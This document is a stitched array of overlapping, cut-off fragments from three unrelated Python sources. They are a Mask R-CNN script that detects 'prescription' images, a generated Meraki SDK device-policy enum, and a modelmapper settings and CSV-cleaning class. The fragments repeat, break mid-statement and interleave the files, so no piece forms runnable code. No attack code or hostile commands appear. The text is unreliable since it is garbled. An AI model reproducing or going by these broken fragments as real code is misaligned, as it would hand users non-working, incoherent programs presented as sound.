"images: print(\"Running on {}\".format(f)) # Read image image = skimage.io.imread(f) # Detect objects",
"= 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device to load",
"to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory to apply",
"= os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of",
"numpy as np import tensorflow as tf import matplotlib import matplotlib.pyplot as plt",
"r = results[0] print(\"- \" * 40 ) print(\"Scores --> \", r['scores']) print(\"found",
"MRCNN_DATA_DIR = \"/\".join( DATA_DIR.split('/')[:-1] ) MRCNN_DATA_DIR = os.path.join( MRCNN_DATA_DIR, \"mrcnn_image\") print(MRCNN_DATA_DIR) images =",
"matplotlib.pyplot as plt import matplotlib.patches as patches from glob import glob import argparse",
"# Import Mask RCNN sys.path.append(ROOT_DIR) # To find local version of the library",
"target dataset to detect') args = parser.parse_args() assert args.dataset ,\\ \"Provide --image directory",
"import matplotlib.patches as patches from glob import glob import argparse import skimage import",
"line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\",",
"of images : \", len(images) ) for f in images: print(\"Running on {}\".format(f))",
"\"mrcnn_image\") print(MRCNN_DATA_DIR) images = glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images",
"Root directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR)",
"the last model you trained weights_path = model.find_last() # Load weights print(\"Loading weights",
") ) def main(): # Parse command line arguments parser = argparse.ArgumentParser( description='Sequential",
"import mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from",
"GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() # Device to",
"inference mode with tf.device(DEVICE): model = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR) # Or, load the",
"to 1 since we'll be running inference on # one image at a",
"math import re import time import numpy as np import tensorflow as tf",
"a model on the same # machine, in which case use CPU and",
"glob( os.path.join(DATA_DIR, \"*.jpg\") ) print(\"* total length of images : \", len(images) )",
"trained model MODEL_DIR = os.path.join(ROOT_DIR, \"logs\") def process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch",
"[dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\"",
"import time import numpy as np import tensorflow as tf import matplotlib import",
"display_images import mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs",
"File Object Detector.') parser.add_argument('--dataset', required=True, metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect')",
"command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object Detector.') parser.add_argument('--dataset', required=True,",
"print(\"Scores --> \", r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in",
"* IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 config = InferenceConfig() #config.display() #",
"argparse import skimage import shutil # Root directory of the project ROOT_DIR =",
"directory of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) #",
"from mrcnn import visualize from mrcnn.visualize import display_images import mrcnn.model as modellib from",
"= 1 config = InferenceConfig() #config.display() # Device to load the neural network",
"total length of images : \", len(images) ) for f in images: print(\"Running",
"np import tensorflow as tf import matplotlib import matplotlib.pyplot as plt import matplotlib.patches",
"results = model.detect([image], verbose=1) r = results[0] print(\"- \" * 40 ) print(\"Scores",
"r['scores']) print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes",
"modes # values: 'inference' or 'training' # TODO: code for 'training' test mode",
"r['class_ids']] if \"prescription\" in classes: print(\"found prescription on %s\" % f.split(\"/\")[-1]) image_file =",
"print(\"found Class Names --> \", [dataset.class_info[i][\"name\"] for i in r['class_ids']] ) classes =",
"process(): class InferenceConfig(miyukiCamera.MiyukiCameraConfig): # Set batch size to 1 since we'll be running",
"network on. # Useful if you're training a model on the same #",
"of the project ROOT_DIR = os.path.abspath(\"../../\") # Import Mask RCNN sys.path.append(ROOT_DIR) # To",
"on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU",
"MRCNN_DATA_DIR, image_file ) ) def main(): # Parse command line arguments parser =",
"modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera",
"main(): # Parse command line arguments parser = argparse.ArgumentParser( description='Sequential Reading File Object",
"metavar=\"/path/to/balloon/dataset\", help='Directory of the target dataset to detect') args = parser.parse_args() assert args.dataset",
"mrcnn.model as modellib from mrcnn.model import log #from samples.cats_dogs import cats_dogs from samples.miyukiCamera",
"model, config = process() dataset = miyukiCamera.MiyukiCameraDataset() DATA_DIR = args.dataset detector(model, config, dataset,",
"classes = [dataset.class_info[i][\"name\"] for i in r['class_ids']] if \"prescription\" in classes: print(\"found prescription",
"to load the neural network on. # Useful if you're training a model",
"'training' # TODO: code for 'training' test mode not ready yet TEST_MODE =",
"or inference modes # values: 'inference' or 'training' # TODO: code for 'training'",
"#from samples.cats_dogs import cats_dogs from samples.miyukiCamera import miyukiCamera # Directory to save logs",
"in training or inference modes # values: 'inference' or 'training' # TODO: code"
] |
[
"enum. The policy to apply to the specified client. Can be 'Whitelisted', 'Blocked',",
"'Group policy'. Required. Attributes: WHITELISTED: TODO: type description here. BLOCKED: TODO: type description",
"'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required. Attributes: WHITELISTED: TODO: type description here.",
"'Normal' or 'Group policy'. Required. Attributes: WHITELISTED: TODO: type description here. BLOCKED: TODO:",
"here. BLOCKED: TODO: type description here. NORMAL: TODO: type description here. ENUM_GROUP POLICY:",
"to the specified client. Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required.",
"the specified client. Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required. Attributes:",
"utf-8 -*- \"\"\" meraki_sdk This file was automatically generated for meraki by APIMATIC",
"policy to apply to the specified client. Can be 'Whitelisted', 'Blocked', 'Normal' or",
"client. Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required. Attributes: WHITELISTED: TODO:",
"apply to the specified client. Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'.",
"ENUM_GROUP POLICY: TODO: type description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked'",
"file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ). \"\"\"",
"https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The policy to",
"). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The policy to apply",
"type description here. NORMAL: TODO: type description here. ENUM_GROUP POLICY: TODO: type description",
"policy'. Required. Attributes: WHITELISTED: TODO: type description here. BLOCKED: TODO: type description here.",
"POLICY: TODO: type description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL",
"type description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL = 'Normal'",
"TODO: type description here. NORMAL: TODO: type description here. ENUM_GROUP POLICY: TODO: type",
"specified client. Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required. Attributes: WHITELISTED:",
"by APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy'",
"'DevicePolicy' enum. The policy to apply to the specified client. Can be 'Whitelisted',",
"-*- coding: utf-8 -*- \"\"\" meraki_sdk This file was automatically generated for meraki",
"here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL = 'Normal' ENUM_GROUP_POLICY =",
"generated for meraki by APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation",
"# -*- coding: utf-8 -*- \"\"\" meraki_sdk This file was automatically generated for",
"v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The",
"WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL = 'Normal' ENUM_GROUP_POLICY = 'Group policy'",
"or 'Group policy'. Required. Attributes: WHITELISTED: TODO: type description here. BLOCKED: TODO: type",
"here. ENUM_GROUP POLICY: TODO: type description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED =",
"the 'DevicePolicy' enum. The policy to apply to the specified client. Can be",
"WHITELISTED: TODO: type description here. BLOCKED: TODO: type description here. NORMAL: TODO: type",
"type description here. ENUM_GROUP POLICY: TODO: type description here. \"\"\" WHITELISTED = 'Whitelisted'",
"Attributes: WHITELISTED: TODO: type description here. BLOCKED: TODO: type description here. NORMAL: TODO:",
"\"\"\" meraki_sdk This file was automatically generated for meraki by APIMATIC v2.0 (",
"NORMAL: TODO: type description here. ENUM_GROUP POLICY: TODO: type description here. \"\"\" WHITELISTED",
"BLOCKED: TODO: type description here. NORMAL: TODO: type description here. ENUM_GROUP POLICY: TODO:",
"to apply to the specified client. Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group",
"( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The policy",
"Can be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required. Attributes: WHITELISTED: TODO: type",
"'Blocked', 'Normal' or 'Group policy'. Required. Attributes: WHITELISTED: TODO: type description here. BLOCKED:",
"\"\"\"Implementation of the 'DevicePolicy' enum. The policy to apply to the specified client.",
"class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The policy to apply to the",
"TODO: type description here. BLOCKED: TODO: type description here. NORMAL: TODO: type description",
"TODO: type description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL =",
"\"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL = 'Normal' ENUM_GROUP_POLICY = 'Group",
"meraki by APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the",
"TODO: type description here. ENUM_GROUP POLICY: TODO: type description here. \"\"\" WHITELISTED =",
"The policy to apply to the specified client. Can be 'Whitelisted', 'Blocked', 'Normal'",
"of the 'DevicePolicy' enum. The policy to apply to the specified client. Can",
"meraki_sdk This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io",
"type description here. BLOCKED: TODO: type description here. NORMAL: TODO: type description here.",
"description here. NORMAL: TODO: type description here. ENUM_GROUP POLICY: TODO: type description here.",
"coding: utf-8 -*- \"\"\" meraki_sdk This file was automatically generated for meraki by",
"be 'Whitelisted', 'Blocked', 'Normal' or 'Group policy'. Required. Attributes: WHITELISTED: TODO: type description",
"APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum.",
"DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The policy to apply to the specified",
"description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED = 'Blocked' NORMAL = 'Normal' ENUM_GROUP_POLICY",
"\"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of the 'DevicePolicy' enum. The policy to apply to",
"here. NORMAL: TODO: type description here. ENUM_GROUP POLICY: TODO: type description here. \"\"\"",
"automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object):",
"for meraki by APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class DevicePolicyEnum(object): \"\"\"Implementation of",
"Required. Attributes: WHITELISTED: TODO: type description here. BLOCKED: TODO: type description here. NORMAL:",
"This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ).",
"description here. ENUM_GROUP POLICY: TODO: type description here. \"\"\" WHITELISTED = 'Whitelisted' BLOCKED",
"was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ). \"\"\" class",
"description here. BLOCKED: TODO: type description here. NORMAL: TODO: type description here. ENUM_GROUP",
"-*- \"\"\" meraki_sdk This file was automatically generated for meraki by APIMATIC v2.0"
] |
[
"\"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client() response = client.get(\"/\") self.assertEqual(200,",
"HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client",
"import TestCase from django.test import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self):",
"def test_http_request(self): client = Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world",
"django.test import TestCase from django.test import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def",
"test_http_request(self): client = Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from",
"def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client() response =",
"self.assertTrue(True) def test_http_request(self): client = Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello",
"class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self):",
"django.test import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\"",
"Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from Django! You're at",
"case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(),",
"world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client()",
"import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True)",
"client = Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from Django!",
"Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def",
"TestCase from django.test import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful",
"from django.test import TestCase from django.test import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\"",
"test case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client() response = client.get(\"/\") self.assertEqual(200, response.status_code)",
"= Client() response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from Django! You're",
"= client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from Django! You're at the index.",
"client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from Django! You're at the index. Bingo\")",
"response = client.get(\"/\") self.assertEqual(200, response.status_code) self.assertEqual(response.content.decode(), \"Hello world from Django! You're at the",
"from django.test import Client class HelloWorldTestCase(TestCase): \"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test",
"tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client() response",
"\"\"\"Hello world tests\"\"\" def test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client =",
"test_successful_case(self): \"\"\"Successful test case\"\"\" self.assertTrue(True) def test_http_request(self): client = Client() response = client.get(\"/\")"
] |
[
"set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i:",
"SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH',",
"defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for",
"in self.settings.field_name_full_conversion: if item == source: item = to_replace break return item def",
"field names. \" \"Please fix that and try again.\") else: if field_name not",
"try: first_value = self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list): self.settings[item] =",
"import defaultdict from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake",
"'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names']",
"[] try: first_value = self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list): self.settings[item]",
"source, to_replace in self.settings.field_name_full_conversion: if item == source: item = to_replace break return",
"class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path",
"not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint",
"i, v in enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data",
"import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME =",
"f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether",
"= {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt",
"not in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError: pass",
"'_']) _max_int = ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int,",
"{} for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str",
"reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping)",
"reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing",
"load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item in convert_to_set:",
"not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and \\",
"item in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key",
"Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set()",
"to_replace in conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\"",
"in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key =",
"importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items(): if",
"def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping",
"whether line has any characters in it that are not in ignore_lines_that_include_only_subset_of return",
"['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation',",
"present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier']",
"deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item,",
"characters # such as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n',",
"def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item =",
"if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item)",
"field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name]",
"dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source,",
"ENV VAR, defaulting to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint,",
"name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3]",
"names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'.",
"counter.most_common(10) if v > 1} if duplicates: raise ValueError(f'The following fields were repeated",
"\" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): #",
"os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false']",
"'_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int']",
"# self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v",
"clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats',",
"copy import deepcopy from collections import defaultdict from collections import namedtuple, Counter from",
"self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings =",
"(('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we",
"'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion, special",
"sys import logging import importlib from ast import literal_eval from copy import deepcopy",
"v in enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might",
"Normalizes list or nested lists \"\"\" if item not in self.settings: self.settings[item] =",
"_verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name in",
"Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions =",
"'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the",
"= {} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item): conv =",
"False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier)",
"clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They",
"modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME",
"up the field_name_part_conversion, special characters # such as \\n need to be added",
"field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and",
"def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {}",
"['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] =",
"field_name_part_conversion, special characters # such as \\n need to be added seperately. #",
"setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None:",
"= logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or",
"import logging import importlib from ast import literal_eval from copy import deepcopy from",
"= {} self.solid_decisions = {} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self,",
"collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def",
"self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')):",
"self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self,",
"load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class",
"' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {} self.failed_to_infer_fields =",
"self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i,",
"def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name] = self._get_clean_field_name(name)",
"names): name_mapping = {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping",
"= ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of',",
"item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key)",
"path needs to end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir)",
"a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with",
"sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false',",
"'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i, v",
"list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item] =",
"identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true']",
"= self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item == source: item =",
"passed to init or SETUP_PATH needs to be a class attribute.') if not",
"self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in",
"'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning",
"have new lines in the field names. \" \"Please fix that and try",
"= {} for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}'",
"self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for",
"self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list)",
"{} self.failed_to_infer_fields = set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion']",
"or SETUP_PATH needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The",
"for i, v in enumerate(line): try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your",
"try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self,",
"v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) #",
"from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\"",
"in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError: pass else:",
"or r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint =",
"self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else",
"first_value = self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i),",
"field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might have new lines in",
"'{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line has any",
"self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and",
